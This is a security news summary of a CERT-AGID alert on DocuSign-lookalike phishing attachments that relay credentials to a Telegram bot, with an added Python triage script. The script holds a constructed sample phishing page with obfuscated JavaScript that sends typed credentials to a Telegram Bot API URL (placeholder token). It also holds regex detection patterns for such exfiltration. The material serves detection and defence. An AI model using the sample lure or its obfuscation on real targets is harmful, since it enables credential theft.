False DocuSign Notification: Credentials Sent to Telegram Bot

CERT-AGID has warned of a DocuSign-themed phishing campaign that uses HTML attachments mimicking the DocuSign login page to capture credentials. The stolen logins are relayed to a Telegram bot, enabling attackers to access sensitive documents or monetize the credentials. #DocuSign #TelegramBot #CERT-AGID

Keypoints

  • CERT-AGID detected a phishing campaign impersonating DocuSign.
  • Malicious emails include HTML attachments that replicate the DocuSign login interface.
  • Embedded JavaScript in the attachment forwards captured credentials to a Telegram bot.
  • Compromised accounts could expose confidential contracts, personal data, and enable fraud.
  • CERT-AGID published the Telegram bot URL via its IoC feed; HTML file hashes vary per recipient.
  • Users are advised to remain vigilant and verify unexpected DocuSign notifications before entering credentials.

MITRE Techniques

  • [T1566] Phishing – Uses deceptive emails with HTML attachments to trick recipients into submitting credentials (‘These deceptive emails contain HTML attachments designed to steal user credentials’).
  • [T1056.003] Input Capture: Web Portal Capture – The fake login page harvests the username and password the victim types into it (‘Collects user credentials to gain unauthorized access to accounts’); this is web-form capture, not OS credential dumping.
  • [T1071] Application Layer Protocol – Posts the captured credentials to the Telegram Bot API over HTTPS (‘send the victim’s credentials to a Telegram bot’); from the exfiltration side the same behaviour maps to T1567, Exfiltration Over Web Service.

Indicators of Compromise

  • [URL] Telegram bot URL – The attacker’s Telegram Bot API endpoint is the primary IoC; the path of that URL carries the bot token, so it identifies this actor’s bot regardless of which HTML variant delivered it. It is provided via CERT-AGID’s IoC feed (see the CERT-AGID IoC feed link in the source).
  • [File hashes] HTML attachment hashes – Each HTML attachment is customized per recipient, so the hash differs from message to message; no hashes are listed in the article and hash-based blocking is of little use against this campaign.

CERT-AGID has flagged a targeted phishing campaign that imitates DocuSign notifications. Attackers send emails containing HTML attachments which, when opened in a browser, present a realistic DocuSign login form designed to trick users into entering their credentials.

JavaScript embedded in the HTML file intercepts the form submission, reads the username and password, and sends them in a request to a Telegram bot controlled by the threat actor; the form never contacts DocuSign at all. Because each HTML file is customized per recipient, the file hashes differ from message to message, so CERT-AGID published the Telegram bot URL via its IoC feed as the most actionable indicator: the bot token in that URL stays fixed across the campaign and can be matched in attachment content and in web-proxy logs, whereas blocking api.telegram.org wholesale would also affect legitimate Telegram use.
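The mechanism above suggests a straightforward triage check for a mail gateway or an analyst: parse the HTML attachment, look for a password field and brand wording, and search the script for a Telegram Bot API call, after undoing the two cheap obfuscations such kits use to defeat a plain grep (string concatenation like "https://api." + "telegram.org" and base64 literals passed to atob()). The following is an added example written for this page, not CERT-AGID tooling and not code from the campaign; the sample attachment, bot token and chat_id are constructed for the demonstration and are not real indicators.

```python
"""Triage an HTML e-mail attachment for a DocuSign-style credential lure that
exfiltrates to a Telegram bot. Added illustrative code, not CERT-AGID tooling."""
import base64
import binascii
import json
import re
from html.parser import HTMLParser

# Telegram Bot API call shape: https://api.telegram.org/bot<bot_id>:<token>/<method>
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot(\d{6,12}):([A-Za-z0-9_-]{30,50})/(sendMessage|sendDocument)",
    re.IGNORECASE,
)
# chat_id written as a JSON key, a JS property or a query-string parameter
CHAT_ID_RE = re.compile(r"""chat_id["']?\s*[:=]\s*["']?(-?\d{5,15})""")
# Two cheap obfuscations: 'https://api.' + 'telegram.org' and atob("<base64>")
CONCAT_RE = re.compile(r"""["']\s*\+\s*["']""")
ATOB_RE = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")
BRAND_WORDS = ("docusign",)

# Constructed sample mirroring the described attachment; token and chat_id are fake.
_B64_PARAMS = base64.b64encode(b"chat_id=-100987654321&parse_mode=HTML").decode()
SAMPLE_HTML = r"""<html><body>
<div class="ds-logo">DocuSign</div>
<form id="login" name="login" onsubmit="return send(event)">
  <input type="email" name="email" placeholder="Email address">
  <input type="password" name="password" placeholder="Password">
  <button type="submit">Log In</button>
</form>
<script>
  var api = "https://api." + "telegram.org/bot" + "123456789:AAF-FakeTokenFakeTokenFakeTokenFakeT" + "/sendMessage";
  var params = atob("__B64__");
  function send(e) {
    e.preventDefault();
    var creds = document.login.email.value + ":" + document.login.password.value;
    fetch(api + "?" + params + "&text=" + encodeURIComponent(creds));
    window.location = "https://www.docusign.com/";
  }
</script>
</body></html>""".replace("__B64__", _B64_PARAMS)


def normalize_script(text):
    """Join concatenated string literals and append the plaintext of every atob() literal."""
    joined = CONCAT_RE.sub("", text)
    decoded = []
    for blob in ATOB_RE.findall(joined):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # not valid base64; leave it alone
    return joined + "\n" + "\n".join(decoded)


class FormScanner(HTMLParser):
    """Collect form actions, input types and visible text (script bodies excluded)."""

    def __init__(self):
        super().__init__()
        self.input_types, self.form_actions, self.text = [], [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
        elif tag == "input":
            self.input_types.append((a.get("type") or "text").lower())
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if not self._in_script:
            self.text.append(data)


def triage_attachment(html):
    """Return what a responder wants: bot token(s), chat_id(s), lure features, verdict."""
    scanner = FormScanner()
    scanner.feed(html)
    scanner.close()
    normalized = normalize_script(html)
    bots, seen = [], set()
    for m in TELEGRAM_BOT_RE.finditer(normalized):
        if m.groups() in seen:
            continue
        seen.add(m.groups())
        bots.append({"bot_id": m.group(1), "token": m.group(2), "method": m.group(3),
                     # method-independent prefix, suitable for a blocklist or proxy alert
                     "ioc_url": f"https://api.telegram.org/bot{m.group(1)}:{m.group(2)}/"})
    visible = " ".join(scanner.text).lower()
    has_password = "password" in scanner.input_types
    brand_lure = any(w in visible for w in BRAND_WORDS)
    if bots and has_password:
        verdict = "malicious"  # credential form wired to an attacker-controlled bot
    elif bots or (has_password and brand_lure):
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "has_password_field": has_password, "brand_lure": brand_lure,
            "form_actions": scanner.form_actions, "telegram_bots": bots,
            "chat_ids": sorted(set(CHAT_ID_RE.findall(normalized)))}


if __name__ == "__main__":
    print(json.dumps(triage_attachment(SAMPLE_HTML), indent=2))
```

On the constructed sample a plain search for "api.telegram.org" or "chat_id" finds nothing, because the URL is split across string literals and the parameters are base64-encoded; the normalisation step recovers both. The `ioc_url` field deliberately stops at the bot token so the same entry matches whichever API method the kit calls, which is also the granularity at which you would want to alert in proxy logs rather than blocking the whole Telegram API host.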

Compromised credentials let attackers read confidential contracts and personal data, or can be sold to other criminals, increasing the risk of fraud. Users should treat unexpected DocuSign emails with caution, check the sender details, and avoid opening unsolicited HTML attachments: a genuine DocuSign notification links to the DocuSign site and does not deliver a login page as an attached file, so open DocuSign directly rather than through an attachment. Anyone who has already entered credentials should change the password immediately and enable multi-factor authentication. Suspicious messages should be reported to the security team, which can block or alert on the bot URL published in the CERT-AGID feed.

Read more: https://www.hendryadrian.com/false-docusign-notification-credentials-sent-to-telegram-bot/